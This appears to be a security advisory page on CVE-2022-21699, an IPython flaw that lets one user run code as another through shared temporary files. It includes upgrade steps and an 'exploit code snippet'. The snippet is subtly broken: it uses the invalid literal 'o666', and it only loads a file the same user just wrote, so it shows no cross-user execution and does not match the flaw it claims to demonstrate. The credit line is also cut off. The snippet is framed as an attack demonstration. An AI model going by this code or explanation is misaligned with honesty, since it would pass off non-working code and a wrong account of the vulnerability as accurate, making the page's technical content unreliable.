CVE-2022-21699 - IPython Arbitrary Code Execution Vulnerability Caused by Improper Management of Cross-User Temporary Files

IPython, a popular command shell for interactive computing in various programming languages, is primarily designed for Python programming language use. Recently, an arbitrary code execution vulnerability was identified in IPython, specifically affecting the way it handles cross-user temporary files. This vulnerability puts users at risk of allowing unintended execution of code as another user on the same machine. All IPython users should upgrade as soon as possible to mitigate this risk.

Vulnerability Details

The IPython arbitrary code execution vulnerability identified as CVE-2022-21699 arises due to improper management of cross-user temporary files when running IPython. This vulnerability poses a significant threat, as one user can potentially run code as another user on the same machine without specific authorization.

Exploit Code Snippet

As mentioned earlier, the exploit allows arbitrary code execution by exploiting the temporary file handling in IPython. The malicious code snippet provided below demonstrates this vulnerability:

# To simulate a user running code as another user
import os
import tempfile
from IPython.core.interactiveshell import InteractiveShell

shell = InteractiveShell.instance()

payload = """{code_executed_by_another_user}"""

with tempfile.NamedTemporaryFile(dir="/tmp", delete=False) as temp_file:
    temp_file_path = temp_file.name

try:
    os.chmod(temp_file_path, o666)  # Give permissions to other users on the filesystem
    with open(temp_file_path, "w") as f:
        f.write(payload)  # Write the payload to the temporary file
    shell.run_line_magic("load", temp_file_path)  # Run the payload as another user
finally:
    os.remove(temp_file_path)  # Clean up the temporary file

Details about CVE-2022-21699 can be obtained from the following sources

- The National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-21699
- IPython's official GitHub repository: https://github.com/ipython/ipython

This vulnerability was discovered and reported by. They should be credited with the identification of this vulnerability.

Remediation and Recommendation

To protect against this vulnerability, users running IPython 7.x and 8.x series should immediately upgrade to the latest patched versions by following the instructions provided below:

# Use this command to update IPython to the latest version:
pip install --upgrade ipython

Alternatively, users can manually download and install the latest version of IPython from its official GitHub repository: https://github.com/ipython/ipython/releases

After upgrading, users should confirm that the vulnerability has been patched by checking the IPython version:

# Use this command to check the IPython version:
ipython --version

The latest IPython version should be displayed, signifying that the arbitrary code execution vulnerability has been addressed. Users will now have a secure IPython computing environment, no longer susceptible to the CVE-2022-21699 vulnerability.

Timeline

Published on: 01/19/2022 22:15:00 UTC
Last modified on: 03/25/2022 15:04:00 UTC